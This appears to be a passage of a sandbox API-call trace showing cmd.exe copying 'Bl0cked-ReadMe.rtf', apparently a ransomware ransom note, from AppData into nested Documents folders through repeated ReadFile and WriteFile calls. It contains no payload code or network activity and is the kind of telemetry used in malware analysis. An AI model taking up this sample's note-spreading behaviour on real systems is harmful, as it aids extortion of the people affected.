GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.016] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.017] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.017] _wcsicmp (_String1="type", _String2=")") returned 75 [0232.018] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0232.018] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0232.018] _wcsicmp (_String1="IF", _String2="type") returned -11 [0232.018] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0232.018] _wcsicmp (_String1="REM", _String2="type") returned -2 [0232.018] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0232.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.024] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f738 | out: lpMode=0x16f738) returned 1 [0232.145] _dup (_FileHandle=1) returned 3 [0232.146] _close (_FileHandle=1) returned 0 [0232.149] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0232.149] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f708, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0232.150] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0232.150] GetConsoleTitleW (in: lpConsoleTitle=0x16f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.151] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0232.151] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0232.151] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0232.151] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0232.152] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.152] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f09c) returned 0x2d0f00 [0232.152] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0232.152] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0232.152] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0232.153] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16dfa8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0232.153] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0232.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.153] GetFileType (hFile=0x54) returned 0x1 [0232.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.153] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e000 | out: lpFileSizeHigh=0x16e000*=0x0) returned 0x1632 [0232.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.153] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.153] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.154] GetFileType (hFile=0x4c) returned 0x1 [0232.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.154] GetFileType (hFile=0x4c) returned 0x1 [0232.154] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.154] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.156] GetFileType (hFile=0x4c) returned 0x1 [0232.156] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.157] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] GetFileType (hFile=0x4c) returned 0x1 [0232.157] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.157] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.158] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] GetFileType (hFile=0x4c) returned 0x1 [0232.158] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.158] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] GetFileType (hFile=0x4c) returned 0x1 [0232.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.159] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.160] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.160] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] GetFileType (hFile=0x4c) returned 0x1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.160] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.161] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.161] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] GetFileType (hFile=0x4c) returned 0x1 [0232.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.161] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] GetFileType (hFile=0x4c) returned 0x1 [0232.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.162] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.162] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.162] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.162] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.163] GetFileType (hFile=0x4c) returned 0x1 [0232.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.164] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.164] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) returned 0x1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.164] GetFileType (hFile=0x4c) 